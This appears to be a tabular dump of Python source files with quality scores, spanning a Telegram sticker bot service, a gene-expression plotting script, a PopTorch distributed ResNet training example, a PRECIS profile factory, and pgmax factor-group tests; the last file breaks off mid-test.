code stringlengths 2k 1.04M | repo_path stringlengths 5 517 | parsed_code stringlengths 0 1.04M | quality_prob float64 0.02 0.95 | learning_prob float64 0.02 0.93 |
|---|---|---|---|---|
import argparse
import logging
import typing
from dataclasses import dataclass
import telegram
import telegram.ext
import cotd.storage
@dataclass
class Options(argparse.Namespace):
log_level: str
version: str
group: int
mode: str
db: int
@dataclass
class Flags(argparse.Namespace):
feature_enable_security: bool
feature_enable_persistence: bool
@dataclass
class EnvConfig:
token: str
@dataclass
class TGBotMetadata:
user: telegram.User
@dataclass
class COTDBotStickers:
sticker_set: telegram.StickerSet
sticker_set_file_ids: typing.List[str]
@dataclass
class HandlerGroup:
group_index: int
handlers: typing.List[telegram.ext.Handler]
@dataclass
class TGBotConfig:
updater: telegram.ext.Updater
options: Options
persistence: telegram.ext.DictPersistence
metadata: TGBotMetadata
handlers: typing.List[HandlerGroup]
commands: typing.List[telegram.BotCommand]
@dataclass
class COTDBotConfig:
features: Flags
logger: logging.Logger
class TGBotClient:
def __init__(self, config: TGBotConfig):
self.options = config.options
self.updater = config.updater
self.metadata = config.metadata
self.commands = config.commands
self.handlers = config.handlers
self.persistence = config.persistence
def set_dispatcher_handlers(self) -> None:
for handler_group in self.handlers:
for handler in handler_group.handlers:
self.updater.dispatcher.add_handler(handler, group=handler_group.group_index)
def set_commands(self) -> None:
self.updater.bot.set_my_commands(self.commands)
def run(self) -> None:
self.updater.start_polling()
self.updater.idle()
def set_secure_sources(self) -> None:
self.updater.dispatcher._cotd_db = self.options.db
self.updater.dispatcher._cotd_group = self.options.group
def initialize(self) -> None:
self.set_secure_sources()
self.set_dispatcher_handlers()
self.set_commands()
class COTDBotService:
def __init__(self, client: TGBotClient, config: COTDBotConfig):
self.client = client
self.logger = config.logger
self.features = config.features
def get_stickers(self) -> COTDBotStickers:
fileids = []
if not (sticker_pack := self._fetch_sticker_set()):
self._init_sticker_set()
sticker_pack = self._fetch_sticker_set()
return COTDBotStickers(
**{
"sticker_set": sticker_pack,
"sticker_set_file_ids": fileids.extend(
list(sticker.file_id for sticker in sticker_pack.stickers)
),
}
)
def _init_sticker_set(self) -> bool:
return self.client.updater.bot.create_new_sticker_set(
png_sticker=open("static/smileyOne512x512.png", "rb"),
name=f"VC_by_{self.client.metadata.user.username}",
title=f"VC_by_{self.client.metadata.user.username}",
user_id=int(145043750),
emojis="🙂😊",
)
def _fetch_sticker_set(self) -> telegram.StickerSet:
try:
return self.client.updater.bot.get_sticker_set(
f"VC_by_{self.client.metadata.user.username}"
)
except telegram.error.BadRequest as err:
raise err
@property
def stickers(self):
return self.get_stickers()
def factory(
envs: EnvConfig,
features: Flags,
options: Options,
client_logger: logging.Logger,
cotd_logger: logging.Logger,
commands: typing.List[telegram.BotCommand],
handlers: typing.List[HandlerGroup],
storage: cotd.storage.TelegramSavedMessagesStorage,
) -> COTDBotService:
storage: cotd.storage.TelegramSavedMessagesStorage | cotd.storage.TelegramSavedMessagesStorageDev = (
storage
if features.feature_enable_persistence
else cotd.storage.TelegramSavedMessagesStorageDev(options.db)
)
bot = telegram.ext.ExtBot(
token=envs.token,
defaults=telegram.ext.Defaults(
parse_mode="HTML",
disable_notification=True,
disable_web_page_preview=True,
timeout=5.0,
),
)
updater = telegram.ext.Updater(
bot=bot,
use_context=True,
persistence=storage,
workers=1,
)
updater.logger = client_logger
updater.dispatcher.logger = client_logger
metadata = TGBotMetadata(updater.bot.get_me())
tg_bot_client = TGBotClient(
TGBotConfig(
updater=updater,
options=options,
metadata=metadata,
handlers=handlers,
commands=commands,
persistence=storage,
)
)
return COTDBotService(
tg_bot_client, config=COTDBotConfig(features=features, logger=cotd_logger)
) | cotd/service.py | import argparse
import logging
import typing
from dataclasses import dataclass
import telegram
import telegram.ext
import cotd.storage
@dataclass
class Options(argparse.Namespace):
log_level: str
version: str
group: int
mode: str
db: int
@dataclass
class Flags(argparse.Namespace):
feature_enable_security: bool
feature_enable_persistence: bool
@dataclass
class EnvConfig:
token: str
@dataclass
class TGBotMetadata:
user: telegram.User
@dataclass
class COTDBotStickers:
sticker_set: telegram.StickerSet
sticker_set_file_ids: typing.List[str]
@dataclass
class HandlerGroup:
group_index: int
handlers: typing.List[telegram.ext.Handler]
@dataclass
class TGBotConfig:
updater: telegram.ext.Updater
options: Options
persistence: telegram.ext.DictPersistence
metadata: TGBotMetadata
handlers: typing.List[HandlerGroup]
commands: typing.List[telegram.BotCommand]
@dataclass
class COTDBotConfig:
features: Flags
logger: logging.Logger
class TGBotClient:
def __init__(self, config: TGBotConfig):
self.options = config.options
self.updater = config.updater
self.metadata = config.metadata
self.commands = config.commands
self.handlers = config.handlers
self.persistence = config.persistence
def set_dispatcher_handlers(self) -> None:
for handler_group in self.handlers:
for handler in handler_group.handlers:
self.updater.dispatcher.add_handler(handler, group=handler_group.group_index)
def set_commands(self) -> None:
self.updater.bot.set_my_commands(self.commands)
def run(self) -> None:
self.updater.start_polling()
self.updater.idle()
def set_secure_sources(self) -> None:
self.updater.dispatcher._cotd_db = self.options.db
self.updater.dispatcher._cotd_group = self.options.group
def initialize(self) -> None:
self.set_secure_sources()
self.set_dispatcher_handlers()
self.set_commands()
class COTDBotService:
def __init__(self, client: TGBotClient, config: COTDBotConfig):
self.client = client
self.logger = config.logger
self.features = config.features
def get_stickers(self) -> COTDBotStickers:
fileids = []
if not (sticker_pack := self._fetch_sticker_set()):
self._init_sticker_set()
sticker_pack = self._fetch_sticker_set()
return COTDBotStickers(
**{
"sticker_set": sticker_pack,
"sticker_set_file_ids": fileids.extend(
list(sticker.file_id for sticker in sticker_pack.stickers)
),
}
)
def _init_sticker_set(self) -> bool:
return self.client.updater.bot.create_new_sticker_set(
png_sticker=open("static/smileyOne512x512.png", "rb"),
name=f"VC_by_{self.client.metadata.user.username}",
title=f"VC_by_{self.client.metadata.user.username}",
user_id=int(145043750),
emojis="🙂😊",
)
def _fetch_sticker_set(self) -> telegram.StickerSet:
try:
return self.client.updater.bot.get_sticker_set(
f"VC_by_{self.client.metadata.user.username}"
)
except telegram.error.BadRequest as err:
raise err
@property
def stickers(self):
return self.get_stickers()
def factory(
envs: EnvConfig,
features: Flags,
options: Options,
client_logger: logging.Logger,
cotd_logger: logging.Logger,
commands: typing.List[telegram.BotCommand],
handlers: typing.List[HandlerGroup],
storage: cotd.storage.TelegramSavedMessagesStorage,
) -> COTDBotService:
storage: cotd.storage.TelegramSavedMessagesStorage | cotd.storage.TelegramSavedMessagesStorageDev = (
storage
if features.feature_enable_persistence
else cotd.storage.TelegramSavedMessagesStorageDev(options.db)
)
bot = telegram.ext.ExtBot(
token=envs.token,
defaults=telegram.ext.Defaults(
parse_mode="HTML",
disable_notification=True,
disable_web_page_preview=True,
timeout=5.0,
),
)
updater = telegram.ext.Updater(
bot=bot,
use_context=True,
persistence=storage,
workers=1,
)
updater.logger = client_logger
updater.dispatcher.logger = client_logger
metadata = TGBotMetadata(updater.bot.get_me())
tg_bot_client = TGBotClient(
TGBotConfig(
updater=updater,
options=options,
metadata=metadata,
handlers=handlers,
commands=commands,
persistence=storage,
)
)
return COTDBotService(
tg_bot_client, config=COTDBotConfig(features=features, logger=cotd_logger)
) | 0.668556 | 0.144209 |
from pathlib import Path
from vectorseq.pipeline.stages import ExpressionPlots
from vectorseq.pipeline import ExpressionPlotsPipeline
from vectorseq.utils import create_dir
from vectorseq.marker_constants import VentralMidbrainGenes
data_dir = Path("/spare_volume/vectorseq-data")
experiment_id = "3382"
brain_region = "snr"
run_dir = data_dir / experiment_id / brain_region
all_cells_output_dir = create_dir(run_dir / "all_cells")
inhibitory_output_dir = run_dir / "inhibitory"
figure_save_dir = create_dir(data_dir / "figures")
figure_save_subdir = create_dir(f"{experiment_id}_{brain_region}_inhibitory_subset")
# Choose clustering scheme to use
n_neighbors = 45
leiden_resolution = 0.6
# %% [markdown]
# ## Expression Plots of Top 50 ranked genes for each inhibitory cluster
# %%
ranked_genes_expression = ExpressionPlots(
source_path=inhibitory_output_dir / "cluster" / "adata.h5ad",
output_dir=figure_save_dir,
output_subdir=Path(figure_save_subdir) / "expression_plots_top50",
n_neighbors=n_neighbors,
leiden_resolution=leiden_resolution,
rank_genes=True,
n_genes=50,
)
results = ranked_genes_expression()
adata = results["adata"]
# %%
gene_expression_pipe = ExpressionPlotsPipeline(
source_data_path=inhibitory_output_dir / "cluster" / "adata.h5ad",
output_dir=figure_save_dir / figure_save_subdir,
n_neighbors=n_neighbors,
leiden_resolution=leiden_resolution,
brain_region=brain_region,
)
adata = gene_expression_pipe()
# %%
final_figure = ExpressionPlots(
source_path=inhibitory_output_dir / "cluster" / "adata.h5ad",
output_dir=figure_save_dir,
output_subdir=Path(figure_save_subdir) / "expression_plots",
n_neighbors=n_neighbors,
leiden_resolution=leiden_resolution,
var_names={
"Genes of Interest": list(
VentralMidbrainGenes().VENTRAL_MIDBRAIN_MARKERS_WITH_TG_SUBSET
)
},
save_name=f"neighbors_{n_neighbors}_leiden_{leiden_resolution}_final_figure",
n_genes=50,
)
results = final_figure()
adata = results["adata"]
# %% | scripts/figures/3382_snr_expression_plots.py | from pathlib import Path
from vectorseq.pipeline.stages import ExpressionPlots
from vectorseq.pipeline import ExpressionPlotsPipeline
from vectorseq.utils import create_dir
from vectorseq.marker_constants import VentralMidbrainGenes
data_dir = Path("/spare_volume/vectorseq-data")
experiment_id = "3382"
brain_region = "snr"
run_dir = data_dir / experiment_id / brain_region
all_cells_output_dir = create_dir(run_dir / "all_cells")
inhibitory_output_dir = run_dir / "inhibitory"
figure_save_dir = create_dir(data_dir / "figures")
figure_save_subdir = create_dir(f"{experiment_id}_{brain_region}_inhibitory_subset")
# Choose clustering scheme to use
n_neighbors = 45
leiden_resolution = 0.6
# %% [markdown]
# ## Expression Plots of Top 50 ranked genes for each inhibitory cluster
# %%
ranked_genes_expression = ExpressionPlots(
source_path=inhibitory_output_dir / "cluster" / "adata.h5ad",
output_dir=figure_save_dir,
output_subdir=Path(figure_save_subdir) / "expression_plots_top50",
n_neighbors=n_neighbors,
leiden_resolution=leiden_resolution,
rank_genes=True,
n_genes=50,
)
results = ranked_genes_expression()
adata = results["adata"]
# %%
gene_expression_pipe = ExpressionPlotsPipeline(
source_data_path=inhibitory_output_dir / "cluster" / "adata.h5ad",
output_dir=figure_save_dir / figure_save_subdir,
n_neighbors=n_neighbors,
leiden_resolution=leiden_resolution,
brain_region=brain_region,
)
adata = gene_expression_pipe()
# %%
final_figure = ExpressionPlots(
source_path=inhibitory_output_dir / "cluster" / "adata.h5ad",
output_dir=figure_save_dir,
output_subdir=Path(figure_save_subdir) / "expression_plots",
n_neighbors=n_neighbors,
leiden_resolution=leiden_resolution,
var_names={
"Genes of Interest": list(
VentralMidbrainGenes().VENTRAL_MIDBRAIN_MARKERS_WITH_TG_SUBSET
)
},
save_name=f"neighbors_{n_neighbors}_leiden_{leiden_resolution}_final_figure",
n_genes=50,
)
results = final_figure()
adata = results["adata"]
# %% | 0.749912 | 0.26011 |
import argparse
import fcntl
import logging
import os
from contextlib import contextmanager
import torch
import torch.nn.functional as F
import torchvision
import poptorch
import popdist
import popdist.poptorch
import horovod.torch as hvd
class ModelWithLoss(torch.nn.Module):
def __init__(self):
super().__init__()
self.model = torchvision.models.resnet18()
self.loss = torch.nn.NLLLoss(reduction='mean')
def forward(self, x, y=None):
logits = self.model(x)
if y is None:
return logits
log_preds = F.log_softmax(logits, dim=1)
loss = self.loss(log_preds, y)
return logits, poptorch.identity_loss(loss, reduction='none')
def train(args):
if popdist.isPopdistEnvSet():
instance = popdist.getInstanceIndex()
else:
instance = 0
opts_train = create_options(args, train=True)
data_train = load_data(args, opts_train, train=True)
model = ModelWithLoss()
# Training the model.
model.train()
optimizer = poptorch.optim.SGD(
model.parameters(),
lr=args.learning_rate,
momentum=args.momentum,
use_combined_accum=True,
)
poptorch_model = poptorch.trainingModel(
model,
opts_train,
optimizer=optimizer,
)
log_in_single_instance("Training the model...")
for epoch in range(args.epochs):
log_in_single_instance(f"Epoch {epoch}")
for x, y in data_train:
_, loss = poptorch_model(x, y)
# Loss contains a value for each replica.
loss = torch.mean(loss)
log_in_single_instance(f"Loss: {loss}")
poptorch_model.destroy()
# Persist checkpoints from all instances even though they are identical,
# this is useful for testing purposes.
torch.save(model.state_dict(), f'checkpoint-instance-{instance}.pt')
# Validation in a single process.
if popdist.isPopdistEnvSet() and instance != 0:
return
opts_validation = create_options(args, train=False)
data_validation = load_data(args, opts_validation, train=False)
model.eval()
poptorch_model = poptorch.inferenceModel(model, opts_validation)
logging.info("Validating the model...")
num_correct_predictions = 0
for x, y in data_validation:
y_pred = poptorch_model(x)
_, y_pred = torch.max(y_pred, 1)
num_correct_predictions += torch.eq(y_pred, y).long().sum().item()
accuracy = num_correct_predictions / len(data_validation.dataset)
logging.info(f"Validation accuracy: {accuracy}")
def create_options(args, train):
if not train:
# We will validate the model in a single process so no need for
# popdist-based options.
return poptorch.Options()
if popdist.isPopdistEnvSet():
opts = popdist.poptorch.Options()
# When using the dataloader with 'auto_distributed_partitioning=True'
# and 'shuffle=True' we must set the random seed to ensure that tensors
# are in the same order in all processes.
opts.randomSeed(args.seed)
# Replication factor is already set via PopRun so
# we ignore 'args.num_replicas'.
logging.info(f"Num of local replicas: {popdist.getNumLocalReplicas()}")
else:
opts = poptorch.Options()
opts.replicationFactor(args.num_replicas)
return opts
def load_data(args, opts, train):
# We need to lock the directory to avoid race conditions related to
# downloading and writing a dataset.
datasets_dir = os.path.expanduser('~/.torch/datasets')
with create_and_lock_directory(datasets_dir):
dataset = torchvision.datasets.CIFAR10(
root=datasets_dir,
train=train,
download=True,
transform=torchvision.transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.5, 0.5, 0.5),
(0.5, 0.5, 0.5),
),
]),
)
# When using a dataloader with 'auto_distributed_partitioning=True',
# PopTorch partitions the dataset for distributed execution (with PopRun)
# automatically.
return poptorch.DataLoader(
opts,
dataset,
batch_size=args.batch_size,
num_workers=args.dataloader_workers,
shuffle=train,
auto_distributed_partitioning=True,
)
def log_in_single_instance(string):
if not popdist.isPopdistEnvSet() or popdist.getInstanceIndex() == 0:
logging.info(string)
@contextmanager
def create_and_lock_directory(dir):
try:
os.makedirs(dir)
except FileExistsError:
pass
dir_fd = os.open(dir, os.O_RDONLY)
fcntl.flock(dir_fd, fcntl.LOCK_EX)
try:
yield
finally:
fcntl.flock(dir_fd, fcntl.LOCK_UN)
os.close(dir_fd)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('--epochs', type=int, default=5)
parser.add_argument('--batch-size', type=int, default=64)
parser.add_argument('--learning-rate', type=float, default=0.001)
parser.add_argument('--momentum', type=float, default=0.9)
parser.add_argument('--num-replicas', type=int, default=4)
parser.add_argument('--dataloader-workers', type=int, default=5)
parser.add_argument('--seed', type=int, default=0)
if popdist.isPopdistEnvSet():
hvd.init()
train(parser.parse_args()) | feature_examples/pytorch/popdist/popdist_training.py | import argparse
import fcntl
import logging
import os
from contextlib import contextmanager
import torch
import torch.nn.functional as F
import torchvision
import poptorch
import popdist
import popdist.poptorch
import horovod.torch as hvd
class ModelWithLoss(torch.nn.Module):
def __init__(self):
super().__init__()
self.model = torchvision.models.resnet18()
self.loss = torch.nn.NLLLoss(reduction='mean')
def forward(self, x, y=None):
logits = self.model(x)
if y is None:
return logits
log_preds = F.log_softmax(logits, dim=1)
loss = self.loss(log_preds, y)
return logits, poptorch.identity_loss(loss, reduction='none')
def train(args):
if popdist.isPopdistEnvSet():
instance = popdist.getInstanceIndex()
else:
instance = 0
opts_train = create_options(args, train=True)
data_train = load_data(args, opts_train, train=True)
model = ModelWithLoss()
# Training the model.
model.train()
optimizer = poptorch.optim.SGD(
model.parameters(),
lr=args.learning_rate,
momentum=args.momentum,
use_combined_accum=True,
)
poptorch_model = poptorch.trainingModel(
model,
opts_train,
optimizer=optimizer,
)
log_in_single_instance("Training the model...")
for epoch in range(args.epochs):
log_in_single_instance(f"Epoch {epoch}")
for x, y in data_train:
_, loss = poptorch_model(x, y)
# Loss contains a value for each replica.
loss = torch.mean(loss)
log_in_single_instance(f"Loss: {loss}")
poptorch_model.destroy()
# Persist checkpoints from all instances even though they are identical,
# this is useful for testing purposes.
torch.save(model.state_dict(), f'checkpoint-instance-{instance}.pt')
# Validation in a single process.
if popdist.isPopdistEnvSet() and instance != 0:
return
opts_validation = create_options(args, train=False)
data_validation = load_data(args, opts_validation, train=False)
model.eval()
poptorch_model = poptorch.inferenceModel(model, opts_validation)
logging.info("Validating the model...")
num_correct_predictions = 0
for x, y in data_validation:
y_pred = poptorch_model(x)
_, y_pred = torch.max(y_pred, 1)
num_correct_predictions += torch.eq(y_pred, y).long().sum().item()
accuracy = num_correct_predictions / len(data_validation.dataset)
logging.info(f"Validation accuracy: {accuracy}")
def create_options(args, train):
if not train:
# We will validate the model in a single process so no need for
# popdist-based options.
return poptorch.Options()
if popdist.isPopdistEnvSet():
opts = popdist.poptorch.Options()
# When using the dataloader with 'auto_distributed_partitioning=True'
# and 'shuffle=True' we must set the random seed to ensure that tensors
# are in the same order in all processes.
opts.randomSeed(args.seed)
# Replication factor is already set via PopRun so
# we ignore 'args.num_replicas'.
logging.info(f"Num of local replicas: {popdist.getNumLocalReplicas()}")
else:
opts = poptorch.Options()
opts.replicationFactor(args.num_replicas)
return opts
def load_data(args, opts, train):
# We need to lock the directory to avoid race conditions related to
# downloading and writing a dataset.
datasets_dir = os.path.expanduser('~/.torch/datasets')
with create_and_lock_directory(datasets_dir):
dataset = torchvision.datasets.CIFAR10(
root=datasets_dir,
train=train,
download=True,
transform=torchvision.transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.5, 0.5, 0.5),
(0.5, 0.5, 0.5),
),
]),
)
# When using a dataloader with 'auto_distributed_partitioning=True',
# PopTorch partitions the dataset for distributed execution (with PopRun)
# automatically.
return poptorch.DataLoader(
opts,
dataset,
batch_size=args.batch_size,
num_workers=args.dataloader_workers,
shuffle=train,
auto_distributed_partitioning=True,
)
def log_in_single_instance(string):
if not popdist.isPopdistEnvSet() or popdist.getInstanceIndex() == 0:
logging.info(string)
@contextmanager
def create_and_lock_directory(dir):
try:
os.makedirs(dir)
except FileExistsError:
pass
dir_fd = os.open(dir, os.O_RDONLY)
fcntl.flock(dir_fd, fcntl.LOCK_EX)
try:
yield
finally:
fcntl.flock(dir_fd, fcntl.LOCK_UN)
os.close(dir_fd)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('--epochs', type=int, default=5)
parser.add_argument('--batch-size', type=int, default=64)
parser.add_argument('--learning-rate', type=float, default=0.001)
parser.add_argument('--momentum', type=float, default=0.9)
parser.add_argument('--num-replicas', type=int, default=4)
parser.add_argument('--dataloader-workers', type=int, default=5)
parser.add_argument('--seed', type=int, default=0)
if popdist.isPopdistEnvSet():
hvd.init()
train(parser.parse_args()) | 0.789477 | 0.32168 |
import precis_i18n.baseclass as _base
import precis_i18n.profile as _profile
import precis_i18n.unicode as _unicode
def _factory(profile, **kwds):
def _construct(ucd):
return profile(ucd, **kwds)
return _construct
_PROFILES = {
'identifierclass':
_factory(_base.IdentifierClass, name='IdentifierClass'),
'freeformclass':
_factory(_base.FreeFormClass, name='FreeFormClass'),
'usernamecasepreserved':
_factory(_profile.Username, name='UsernameCasePreserved'),
'usernamecasemapped':
_factory(_profile.Username, name='UsernameCaseMapped', casemap='lower'),
'usernamecasemapped_casefold':
_factory(_profile.Username,
name='UsernameCaseMapped:CaseFold',
casemap='fold'),
'usernamecasemapped_tolower':
_factory(_profile.Username,
name='UsernameCaseMapped:ToLower',
casemap='lower'),
'opaquestring':
_factory(_profile.OpaqueString, name='OpaqueString'),
'nicknamecasepreserved':
_factory(_profile.Nickname, name='NicknameCasePreserved'),
'nicknamecasemapped':
_factory(_profile.Nickname, name='NicknameCaseMapped', casemap='lower'),
'nicknamecasemapped_casefold':
_factory(_profile.Nickname,
name='NicknameCaseMapped:CaseFold',
casemap='fold'),
'nicknamecasemapped_tolower':
_factory(_profile.Nickname,
name='NicknameCaseMapped:ToLower',
casemap='lower'),
# Alias for backward-compatibility with previous version of codec.
'nickname':
_factory(_profile.Nickname, name='Nickname', casemap='lower')
}
def get_profile(name, *, unicodedata=None):
"""Return the desired PRECIS profile object.
Choose name from:
"IdentifierClass"
"FreeFormClass"
"UsernameCasePreserved"
"UsernameCaseMapped"
"UsernameCaseMapped:CaseFold"
"UsernameCaseMapped:ToLower"
"OpaqueString"
"NicknameCasePreserved"
"NicknameCaseMapped"
"NicknameCaseMapped:CaseFold"
"NicknameCaseMapped:ToLower"
"Nickname" (alias for "NicknameCaseMapped")
This function constructs a new profile each time; there is no cache.
To use an alternative Unicode implementation, pass a module or object that
implements the unicodedata interface via the unicodedata keyword argument.
The default is to use the unicodedata module built into the Python runtime.
Args:
name (str): name of a PRECIS profile
unicodedata (module|object): Alternative unicodedata interface
Returns:
AbstractProfile: PRECIS profile object.
Raises:
KeyError: Profile not found.
"""
profile = name.lower().replace(':', '_')
return _PROFILES[profile](_unicode.UnicodeData(unicodedata)) | precis_i18n/factory.py |
import precis_i18n.baseclass as _base
import precis_i18n.profile as _profile
import precis_i18n.unicode as _unicode
def _factory(profile, **kwds):
def _construct(ucd):
return profile(ucd, **kwds)
return _construct
_PROFILES = {
'identifierclass':
_factory(_base.IdentifierClass, name='IdentifierClass'),
'freeformclass':
_factory(_base.FreeFormClass, name='FreeFormClass'),
'usernamecasepreserved':
_factory(_profile.Username, name='UsernameCasePreserved'),
'usernamecasemapped':
_factory(_profile.Username, name='UsernameCaseMapped', casemap='lower'),
'usernamecasemapped_casefold':
_factory(_profile.Username,
name='UsernameCaseMapped:CaseFold',
casemap='fold'),
'usernamecasemapped_tolower':
_factory(_profile.Username,
name='UsernameCaseMapped:ToLower',
casemap='lower'),
'opaquestring':
_factory(_profile.OpaqueString, name='OpaqueString'),
'nicknamecasepreserved':
_factory(_profile.Nickname, name='NicknameCasePreserved'),
'nicknamecasemapped':
_factory(_profile.Nickname, name='NicknameCaseMapped', casemap='lower'),
'nicknamecasemapped_casefold':
_factory(_profile.Nickname,
name='NicknameCaseMapped:CaseFold',
casemap='fold'),
'nicknamecasemapped_tolower':
_factory(_profile.Nickname,
name='NicknameCaseMapped:ToLower',
casemap='lower'),
# Alias for backward-compatibility with previous version of codec.
'nickname':
_factory(_profile.Nickname, name='Nickname', casemap='lower')
}
def get_profile(name, *, unicodedata=None):
"""Return the desired PRECIS profile object.
Choose name from:
"IdentifierClass"
"FreeFormClass"
"UsernameCasePreserved"
"UsernameCaseMapped"
"UsernameCaseMapped:CaseFold"
"UsernameCaseMapped:ToLower"
"OpaqueString"
"NicknameCasePreserved"
"NicknameCaseMapped"
"NicknameCaseMapped:CaseFold"
"NicknameCaseMapped:ToLower"
"Nickname" (alias for "NicknameCaseMapped")
This function constructs a new profile each time; there is no cache.
To use an alternative Unicode implementation, pass a module or object that
implements the unicodedata interface via the unicodedata keyword argument.
The default is to use the unicodedata module built into the Python runtime.
Args:
name (str): name of a PRECIS profile
unicodedata (module|object): Alternative unicodedata interface
Returns:
AbstractProfile: PRECIS profile object.
Raises:
KeyError: Profile not found.
"""
profile = name.lower().replace(':', '_')
return _PROFILES[profile](_unicode.UnicodeData(unicodedata)) | 0.715821 | 0.076167 |
import re
import jax.numpy as jnp
import numpy as np
import pytest
from pgmax import fgroup, vgroup
def test_single_factor():
with pytest.raises(ValueError, match="Cannot create a FactorGroup with no Factor."):
fgroup.ORFactorGroup(variables_for_factors=[])
A = vgroup.NDVarArray(num_states=2, shape=(10,))
B = vgroup.NDVarArray(num_states=2, shape=(10,))
variables0 = (A[0], B[0])
variables1 = (A[1], B[1])
ORFactor0 = fgroup.ORFactorGroup(variables_for_factors=[variables0])
with pytest.raises(
ValueError, match="SingleFactorGroup should only contain one factor. Got 2"
):
fgroup.SingleFactorGroup(
variables_for_factors=[variables0, variables1],
factor=ORFactor0,
)
ORFactor1 = fgroup.ORFactorGroup(variables_for_factors=[variables1])
ORFactor0 < ORFactor1
def test_enumeration_factor_group():
vg = vgroup.NDVarArray(shape=(2, 2), num_states=3)
with pytest.raises(
ValueError,
match=re.escape("Expected log potentials shape: (1,) or (2, 1). Got (3, 2)"),
):
enumeration_factor_group = fgroup.EnumFactorGroup(
variables_for_factors=[
[vg[0, 0], vg[0, 1], vg[1, 1]],
[vg[0, 1], vg[1, 0], vg[1, 1]],
],
factor_configs=np.zeros((1, 3), dtype=int),
log_potentials=np.zeros((3, 2)),
)
with pytest.raises(ValueError, match=re.escape("Potentials should be floats")):
enumeration_factor_group = fgroup.EnumFactorGroup(
variables_for_factors=[
[vg[0, 0], vg[0, 1], vg[1, 1]],
[vg[0, 1], vg[1, 0], vg[1, 1]],
],
factor_configs=np.zeros((1, 3), dtype=int),
log_potentials=np.zeros((2, 1), dtype=int),
)
enumeration_factor_group = fgroup.EnumFactorGroup(
variables_for_factors=[
[vg[0, 0], vg[0, 1], vg[1, 1]],
[vg[0, 1], vg[1, 0], vg[1, 1]],
],
factor_configs=np.zeros((1, 3), dtype=int),
)
name = [vg[0, 0], vg[1, 1]]
with pytest.raises(
ValueError,
match=re.escape(
f"The queried factor connected to the set of variables {frozenset(name)} is not present in the factor group."
),
):
enumeration_factor_group[name]
assert (
enumeration_factor_group[[vg[0, 1], vg[1, 0], vg[1, 1]]]
== enumeration_factor_group.factors[1]
)
with pytest.raises(
ValueError,
match=re.escape(
"data should be of shape (2, 1) or (2, 9) or (1,). Got (4, 5)."
),
):
enumeration_factor_group.flatten(np.zeros((4, 5)))
assert jnp.all(enumeration_factor_group.flatten(np.ones(1)) == jnp.ones(2))
assert jnp.all(enumeration_factor_group.flatten(np.ones((2, 9))) == jnp.ones(18))
with pytest.raises(
ValueError, match=re.escape("Can only unflatten 1D array. Got a 3D array.")
):
enumeration_factor_group.unflatten(jnp.ones((1, 2, 3)))
with pytest.raises(
ValueError,
match=re.escape(
"flat_data should be compatible with shape (2, 1) or (2, 9). Got (30,)"
),
):
enumeration_factor_group.unflatten(jnp.zeros(30))
assert jnp.all(
enumeration_factor_group.unflatten(jnp.arange(2)) == jnp.array([[0], [1]])
)
assert jnp.all(enumeration_factor_group.unflatten(jnp.ones(18)) == jnp.ones((2, 9)))
def test_pairwise_factor_group():
vg = vgroup.NDVarArray(shape=(2, 2), num_states=3)
with pytest.raises(
ValueError, match=re.escape("log_potential_matrix should be either a 2D array")
):
fgroup.PairwiseFactorGroup([[vg[0, 0], vg[1, 1]]], np.zeros((1,), dtype=float))
with pytest.raises(
ValueError, match=re.escape("Potential matrix should be floats")
):
fgroup.PairwiseFactorGroup([[vg[0, 0], vg[1, 1]]], np.zeros((3, 3), dtype=int))
with pytest.raises(
ValueError,
match=re.escape(
"Expected log_potential_matrix for 1 factors. Got log_potential_matrix for 2 factors."
),
):
fgroup.PairwiseFactorGroup(
[[vg[0, 0], vg[1, 1]]], np.zeros((2, 3, 3), dtype=float)
)
with pytest.raises(
ValueError,
match=re.escape(
"All pairwise factors should connect to exactly 2 variables. Got a factor connecting to 3 variables"
),
):
fgroup.PairwiseFactorGroup(
[[vg[0, 0], vg[1, 1], vg[0, 1]]], np.zeros((3, 3), dtype=float)
)
name = [vg[0, 0], vg[1, 1]]
with pytest.raises(
ValueError,
match=re.escape(f"The specified pairwise factor {name}"),
):
fgroup.PairwiseFactorGroup([name], np.zeros((4, 4), dtype=float))
pairwise_factor_group = fgroup.PairwiseFactorGroup(
[[vg[0, 0], vg[1, 1]], [vg[1, 0], vg[0, 1]]],
)
with pytest.raises(
ValueError,
match=re.escape(
"data should be of shape (2, 3, 3) or (2, 6) or (3, 3). Got (4, 4)."
),
):
pairwise_factor_group.flatten(np.zeros((4, 4)))
assert jnp.all(
pairwise_factor_group.flatten(np.zeros((3, 3))) == jnp.zeros(2 * 3 * 3)
)
assert jnp.all(pairwise_factor_group.flatten(np.zeros((2, 6))) == jnp.zeros(12))
with pytest.raises(ValueError, match="Can only unflatten 1D array. Got a 2D array"):
pairwise_factor_group.unflatten(np.zeros((10, 20)))
assert jnp.all(
pairwise_factor_group.unflatten(np.zeros(2 * 3 * 3)) == jnp.zeros((2, 3, 3))
)
assert jnp.all(
pairwise_factor_group.unflatten(np.zeros(2 * 6)) == jnp.zeros((2, 6))
)
with pytest.raises(
ValueError,
match=re.escape(
"flat_data should be compatible with shape (2, 3, 3) or (2, 6). Got (10,)."
),
):
pairwise_factor_group.unflatten(np.zeros(10)) | tests/fgroup/test_fgroup.py | import re
import jax.numpy as jnp
import numpy as np
import pytest
from pgmax import fgroup, vgroup
def test_single_factor():
with pytest.raises(ValueError, match="Cannot create a FactorGroup with no Factor."):
fgroup.ORFactorGroup(variables_for_factors=[])
A = vgroup.NDVarArray(num_states=2, shape=(10,))
B = vgroup.NDVarArray(num_states=2, shape=(10,))
variables0 = (A[0], B[0])
variables1 = (A[1], B[1])
ORFactor0 = fgroup.ORFactorGroup(variables_for_factors=[variables0])
with pytest.raises(
ValueError, match="SingleFactorGroup should only contain one factor. Got 2"
):
fgroup.SingleFactorGroup(
variables_for_factors=[variables0, variables1],
factor=ORFactor0,
)
ORFactor1 = fgroup.ORFactorGroup(variables_for_factors=[variables1])
ORFactor0 < ORFactor1
def test_enumeration_factor_group():
vg = vgroup.NDVarArray(shape=(2, 2), num_states=3)
with pytest.raises(
ValueError,
match=re.escape("Expected log potentials shape: (1,) or (2, 1). Got (3, 2)"),
):
enumeration_factor_group = fgroup.EnumFactorGroup(
variables_for_factors=[
